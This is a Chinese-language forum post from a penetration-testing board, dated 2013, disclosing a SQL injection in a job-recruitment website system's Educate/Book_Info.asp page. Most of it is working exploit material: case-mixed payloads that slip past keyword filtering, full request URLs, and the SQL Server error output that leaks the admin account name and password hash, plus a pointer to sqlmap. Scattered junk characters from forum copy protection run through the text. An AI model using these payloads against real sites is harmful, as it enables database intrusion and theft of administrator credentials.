中国网络渗透测试联盟

标题: 网络求职招聘人才网站系统正式版注入 [打印本页]
作者: admin    时间: 2013-2-16 21:44
标题: 网络求职招聘人才网站系统正式版注入
漏洞出现在Educate/Book_Info.asp
1 ?# S6 ]) v+ P) Y1 z4 b . x; r3 J* U; U5 `5 G+ s. v
此处注入点虽然过滤了一些关键字 但是我们还是可以盲注的 可以利用sqlmap跑出/ D8 H1 s5 G( E1 [) ~

* N% C3 \, _" K) L) H9 q  wexp:如下: W" P( q" @& j' h
查询管理账号:+aNd+0=(selEct+toP+1+su_SupperName+frOm+pH_Web_Supper)4 J) b4 c* z3 b2 u6 c( A/ y5 f
查询管理密码:+aNd+0=(selEct+toP+1+su_Password+frOm+pH_Web_Supper)
) z* n4 P  s/ k; \- Q; p& ` - B- p6 @1 P7 u! ], s* k
http://www.xxx.com /Educate/Book_Info.asp?Param=20+aNd+0=(selEct+toP+1+su_SupperName+frOm+pH_Web_Supper)
8 _" v4 C6 a' [ 5 m2 Z' I4 z2 R) ]. ^2 T- |
Microsoft OLE DB Provider for SQL Server 错误 '80040e07'
& D! g" I8 T8 }! x& Q! _# B
# m! ~+ N7 q2 Z- A. y+ M7 R将 nvarchar 值 'hackbase' 转换为数据类型为 int 的列时发生语法错误。
2 _+ d$ R, l% C
" c- |* Q. k, x7 k$ ^8 k/Educate/Book_Info.asp,行 8) X9 P% D- x8 w: H. Z
1 o* `0 n9 H/ a' Q  I
http://www.xxx.com /Educate/Book_Info.asp?Param=20+aNd+0=(selEct+toP+1+su_Password+frOm+pH_Web_Supper)
# O; [& T5 |6 \$ N- N
7 q) p  d7 T0 pMicrosoft OLE DB Provider for SQL Server 错误 '80040e07'
* U1 ^0 e+ I3 ]6 Z
2 p, s' z0 H$ R; w- y1 Z) D/ d将 nvarchar 值 '165706AD8319D7F95B7FC5E82FBE8F' 转换为数据类型为 int 的列时发生语法错误。8 Z" K; S) i" D3 z, g( v/ P
  O, t) g/ ~' V- u
/Educate/Book_Info.asp,行 8) Y# A4 Q, r3 F$ U0 A




欢迎光临 中国网络渗透测试联盟 (https://cobjon.com/) Powered by Discuz! X3.2